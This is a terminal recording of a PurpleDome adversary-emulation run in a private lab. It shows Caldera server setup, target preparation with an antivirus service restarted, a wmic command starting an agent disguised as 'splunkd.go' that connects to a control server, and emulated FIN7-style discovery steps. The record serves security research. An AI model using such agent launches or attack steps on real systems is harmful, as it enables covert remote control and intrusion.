{"version": 2, "width": 148, "height": 47, "timestamp": 1623220625, "idle_time_limit": 0.5, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}} [0.016732, "o", "\u001b]0;thorsten@avast: /home/PurpleDome\u0007\u001b[01;32mthorsten@avast\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] [1.249977, "o", "python3 ./experiment_control.py -v run"] [1.8469, "o", "\r\n"] [1.989824, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"] [1.98994, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"] [44.497129, "o", "\u001b[94mInstalling Caldera server \u001b[0m\r\n\u001b[92mCaldera server installed \u001b[0m\r\n"] [46.148337, "o", "zsh:cd:1: no such file or directory: None\r\n"] [46.152243, "o", "fatal: destination path 'caldera' already exists and is not an empty directory.\r\n"] [46.60299, "o", "Defaulting to user installation because normal site-packages is not writeable\r\n"] [46.65791, "o", "Requirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\n"] [46.658396, "o", "Requirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\n"] [46.658948, "o", "Requirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\n"] [46.659644, "o", "Requirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\n"] [46.660103, "o", "Requirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\n"] [46.660601, "o", "Requirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\n"] [46.661215, "o", "Requirement already satisfied: cryptography==2.8 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\n"] [46.661805, "o", "Requirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\n"] [46.662547, "o", "Requirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\n"] [46.66313, "o", "Requirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\n"] [46.663676, "o", "Requirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\n"] [46.664321, "o", "Requirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\n"] [46.664861, "o", "Requirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\n"] [46.665769, "o", "Requirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\n"] [46.666323, "o", "Requirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\n"] [46.675298, "o", "Requirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\n"] [46.675664, "o", "Requirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\n"] [46.676383, "o", "Requirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\n"] [46.676888, "o", "Requirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\n"] [46.677518, "o", "Requirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\n"] [46.694408, "o", "Requirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-packages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\n"] [46.705625, "o", "Requirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\n"] [46.706241, "o", "Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\n"] [46.719201, "o", "Requirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\n"] [46.719573, "o", "Requirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\n"] [46.720224, "o", "Requirement already satisfied: requests>=2.5.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.24.0)\r\n"] [46.720647, "o", "Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\n"] [46.721477, "o", "Requirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\n"] [46.722037, "o", "Requirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\n"] [46.722637, "o", "Requirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"] [46.723175, "o", "Requirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.1.0)\r\n"] [46.723793, "o", "Requirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\n"] [46.72433, "o", "Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\n"] [46.724817, "o", "Requirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] [46.725408, "o", "Requirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\n"] [46.725894, "o", "Requirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] [46.726375, "o", "Requirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.5)\r\n"] [46.727076, "o", "Requirement already satisfied: docutils>=0.12 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.16)\r\n"] [46.731192, "o", "Requirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\n"] [46.744698, "o", "Requirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\n"] [46.753132, "o", "Requirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (0.57.0)\r\n"] [46.75779, "o", "Requirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\n"] [46.75982, "o", "Requirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\n"] [46.763264, "o", "Requirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\n"] [46.763892, "o", "Requirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\n"] [46.779935, "o", "Requirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n"] [47.114079, "o", "Command exited with status 0.\r\n=== stdout ===\r\nDefaulting to user installation because normal site-packages is not writeable\r\nRequirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\nRequirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\nRequirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\nRequirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\nRequirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\nRequirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\nRequirement already satisfied: cryptography==2.8 in /h"] [47.114214, "o", "ome/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\nRequirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\nRequirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\nRequirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\nRequirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\nRequirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\nRequirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\nRequirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/p"] [47.114265, "o", "ython3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\nRequirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\nRequirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\nRequirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\nRequirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\nRequirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\nRequirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\nRequirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-pac"] [47.114305, "o", "kages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\nRequirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\nRequirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\nRequirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\nRequirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\nRequirement already satisfied: requests>=2.5.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.24.0)\r\nRequirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\nRequirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx=="] [47.114341, "o", "3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\nRequirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\nRequirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\nRequirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.1.0)\r\nRequirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\nRequirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\nRequirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\nRequirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/"] [47.114379, "o", "python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\nRequirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\nRequirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.5)\r\nRequirement already satisfied: docutils>=0.12 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.16)\r\nRequirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\nRequirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\nRequirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (li"] [47.114445, "o", "ne 14)) (0.57.0)\r\nRequirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\nRequirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\nRequirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\nRequirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\nRequirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\nfatal: destination path 'caldera' already exists and is not an empty directory.\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\nfatal: destination path 'caldera' already"] [47.114492, "o", " exists and is not an empty directory.\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"] [47.29882, "o", "None\r\n"] [57.386237, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"] [57.39097, "o", "\u001b[94mpreparing target target2 ....\u001b[0m\r\n"] [57.394121, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"] [57.394259, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"] [58.061945, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] [58.062104, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] [365.815169, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] [366.127765, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] [366.43231, "o", " 1 file(s) copied.\r\r\n"] [366.448343, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] [366.528428, "o", "\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 3 STOP_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x1\r\r\n WAIT_HINT : 0x2bf20\r\r\n"] [366.549334, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 3 STOP_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x1\r\r\n WAIT_HINT : 0x2bf20\r\n\r\n(no stderr)\r\n"] [371.585517, "o", " 1 file(s) copied.\r\r\n"] [371.608795, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] [371.666169, "o", " 1 file(s) copied.\r\r\n"] [371.681221, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] [371.746656, "o", " 1 file(s) copied.\r\r\n"] [371.760721, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] [371.830233, "o", "The operation completed successfully.\r\r\r\n"] [371.847954, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"] [371.922877, "o", "The operation completed successfully.\r\r\r\n"] [371.942729, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nThe operation completed successfully.\r\n\r\nDebug: Stderr: The operation completed successfully.\r\n"] [372.015059, "o", "The operation completed successfully.\r\r\r\n"] [372.03526, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nThe operation completed successfully.\r\n\r\nDebug: Stderr: The operation completed successfully.\r\n"] [374.191468, "o", "\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 2 START_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x0\r\r\n WAIT_HINT : 0x7d0\r\r\n PID : 984\r\r\n FLAGS : \r\r\n"] [374.612598, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 2 START_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x0\r\r\n WAIT_HINT : 0x7d0\r\r\n PID : 984\r\r\n FLAGS :\r\n\r\n(no stderr)\r\n"] [376.733509, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [441.799386, "o", "\u001b[92mTarget is up: target2 \u001b[0m\r\n\u001b[94mpreparing target target3 ....\u001b[0m\r\n"] [441.802436, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"] [441.802622, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"] [445.219168, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] [445.219374, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] [612.735313, "o", "\u001b[92mTarget is up: target3 \u001b[0m\r\n"] [613.105912, "o", "The account already exists.\r\r\n\r\r\n"] [613.106507, "o", "More help is available by typing NET HELPMSG 2224.\r\r\n"] [613.106678, "o", "\r\r\n"] [613.377246, "o", "The account already exists.\r\r\n\r\r\n"] [613.377462, "o", "More help is available by typing NET HELPMSG 2224.\r\r\n"] [613.377569, "o", "\r\r\n"] [613.651823, "o", "The account already exists.\r\r\n\r\r\nMore help is available by typing NET HELPMSG 2224.\r\r\n"] [613.651996, "o", "\r\r\n"] [613.919243, "o", "The account already exists.\r\r\n"] [613.919426, "o", "\r\r\nMore help is available by typing NET HELPMSG 2224.\r\r\n"] [613.91954, "o", "\r\r\n"] [614.175234, "o", "System error 1378 has occurred.\r\r\n"] [614.175403, "o", "\r\r\nThe specified account name is already a member of the group.\r\r\n"] [614.17558, "o", "\r\r\n"] [614.426216, "o", "System error 1378 has occurred.\r\r\n"] [614.426371, "o", "\r\r\n"] [614.426466, "o", "The specified account name is already a member of the group.\r\r\n"] [614.426641, "o", "\r\r\n"] [614.687573, "o", "System error 1378 has occurred.\r\r\n\r\r\nThe specified account name is already a member of the group.\r\r\n"] [614.687686, "o", "\r\r\n"] [614.952564, "o", "System error 1378 has occurred.\r\r\n"] [614.952665, "o", "\r\r\n"] [614.952793, "o", "The specified account name is already a member of the group.\r\r\n"] [614.95295, "o", "\r\r\n"] [615.211853, "o", "The operation completed successfully.\r\r\r\n"] [615.230597, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"] [615.69261, "o", "\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\r\n"] [615.692721, "o", "\r\r\n"] [615.731812, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\n\r\n(no stderr)\r\n"] [615.768572, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [615.871724, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [615.894056, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [615.94657, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [616.252327, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] [616.522501, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] [616.77925, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [616.88319, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [616.968447, "o", "[SC] StartService FAILED 1056:\r\r\n\r\r\nAn instance of the service is already running.\r\r\n\r\r\n"] [617.223748, "o", "[SC] StartService FAILED 1056:\r\r\n\r\r\nAn instance of the service is already running.\r\r\n\r\r\n"] [619.574809, "o", "Executing (Win32_Process)->Create()\r\r\r\n"] [619.605721, "o", "Method execution successful.\r\r\r\nOut Parameters:\r\r\ninstance of __PARAMETERS\r\r\n{\r\r\n\tProcessId = 4092;\r\r\n\tReturnValue = 0;\r\r\n};\r\r\n"] [619.605843, "o", "\r\r\n"] [619.657522, "o", "Command exited with status 0.\r\n=== stdout ===\r\nExecuting (Win32_Process)->Create()\r\r\r\nMethod execution successful.\r\r\r\nOut Parameters:\r\r\ninstance of __PARAMETERS\r\r\n{\r\r\n\tProcessId = 4092;\r\r\n\tReturnValue = 0;\r\r\n};\r\n\r\n=== stderr ===\r\n\r\n\r\nDebug: Stderr: \r\n"] [624.900179, "o", "cp: './idpx' and '/home/vagrant/idpx' are the same file\r\n"] [625.360739, "o", "cp: './idpx' and '/home/vagrant/idpx' are the same file\r\n"] [625.666636, "o", "None\r\n\u001b[94mStarting Caldera client target2 \u001b[0m\r\n"] [626.241241, "o", "wmic process call create \"%userprofile%\\splunkd.go -server http://192.168.178.132:8888 -group red_windows -paw target2w\" \r\n"] [626.255297, "o", "None\r\n\u001b[92mCaldera client started \u001b[0m\r\n"] [626.255338, "o", "\u001b[92mInitial start of caldera client: target3 \u001b[0m\r\n\u001b[94mStarting Caldera client target3 \u001b[0m\r\n"] [626.264956, "o", "cd /home/vagrant; chmod +x caldera_agent.sh; nohup bash ./caldera_agent.sh\r\n"] [626.266353, "o", "None\r\n\u001b[92mCaldera client started \u001b[0m\r\n"] [626.266412, "o", "\u001b[92mInitial start of caldera client: target3 \u001b[0m\r\n"] [646.285467, "o", "\u001b[94mContacting caldera agents on all targets ....\u001b[0m\r\n"] [646.293778, "o", "\u001b[92mCaldera agents reached\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\n"] [646.754051, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221271.460396', 'rules': [], 'relationships': [], 'facts': []}\r\n"] [646.758928, "o", "Got:\r\n"] [646.760695, "o", "[]\r\n"] [646.954014, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: bd527b63-9f9e-46e0-9816-b8434d2b8989 \u001b[0m\r\n\u001b[104m Current User: Obtain user from current session \u001b[0m\r\n"] [687.011907, "o", "'target2w\\\\attackx\\r'\r\n"] [687.313306, "o", "\u001b[94mRestarting caldera server and waiting for clients to re-connect\u001b[0m\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"] [687.345847, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [687.370986, "o", "None\r\n"] [697.460587, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"] [731.612754, "o", "\u001b[92mRestarted caldera server clients re-connected\u001b[0m\r\n"] [732.055067, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221356.779327', 'rules': [], 'relationships': [], 'facts': []}\r\n"] [732.06055, "o", "Got:\r\n"] [732.062419, "o", "[]\r\n"] [732.256434, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target3 Group: red_linux Ability: bd527b63-9f9e-46e0-9816-b8434d2b8989 \u001b[0m\r\n\u001b[104m Current User: Obtain user from current session \u001b[0m\r\n"] [792.342252, "o", "'vagrant'\r\n"] [792.654227, "o", "\u001b[94mRestarting caldera server and waiting for clients to re-connect\u001b[0m\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"] [792.686988, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [792.688926, "o", "None\r\n"] [802.77716, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"] [828.884346, "o", "\u001b[92mRestarted caldera server clients re-connected\u001b[0m\r\n\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\nAttacking machine with PAW: target2w with attack: fin7_1\r\n"] [828.887288, "o", "\u001b[94mStep 1: Initial Breach\u001b[0m\r\n\u001b[92mEnd Step 1: Initial Breach\u001b[0m\r\n\u001b[94mStep 2: Delayed Malware Execution\u001b[0m\r\n\u001b[92mEnd Step 2: Delayed Malware Execution\u001b[0m\r\n"] [828.887345, "o", "\u001b[94mStep 3: Target Assessment\u001b[0m\r\n\u001b[96mnew view \u001b[0m\r\n"] [829.351867, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221454.053941', 'rules': [], 'relationships': [], 'facts': [{'trait': 'remote.host.fqdn', 'value': '192.168.178.189'}]}\r\n"] [829.358865, "o", "Got:\r\n"] [829.360445, "o", "[]\r\n"] [829.55338, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: deeac480-5c2a-42b5-90bb-41675ee53c7e \u001b[0m\r\n\u001b[104m View remote shares: View the shares of a remote host \u001b[0m\r\n"] [869.610888, "o", "('Shared resources at \\\\\\\\192.168.178.189\\r'\r\n '\\r'\r\n '\\r'\r\n '\\r'\r\n 'Share name Type Used as Comment \\r'\r\n '\\r'\r\n '-------------------------------------------------------------------------------\\r'\r\n 'ADMIN$ Disk Remote Admin \\r'\r\n 'C$ Disk Default share \\r'\r\n 'IPC$ IPC Remote IPC \\r'\r\n 'The command completed successfully.\\r'\r\n '\\r')\r\n"] [869.913776, "o", "\u001b[96mget-wmiobject win32_computersystem | fl model\u001b[0m\r\n"] [870.362918, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221495.0803838', 'rules': [], 'relationships': [], 'facts': []}\r\n"] [870.368332, "o", "Got:\r\n"] [870.370061, "o", "[]\r\n"] [870.54879, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 5dc841fd-28ad-40e2-b10e-fb007fe09e81 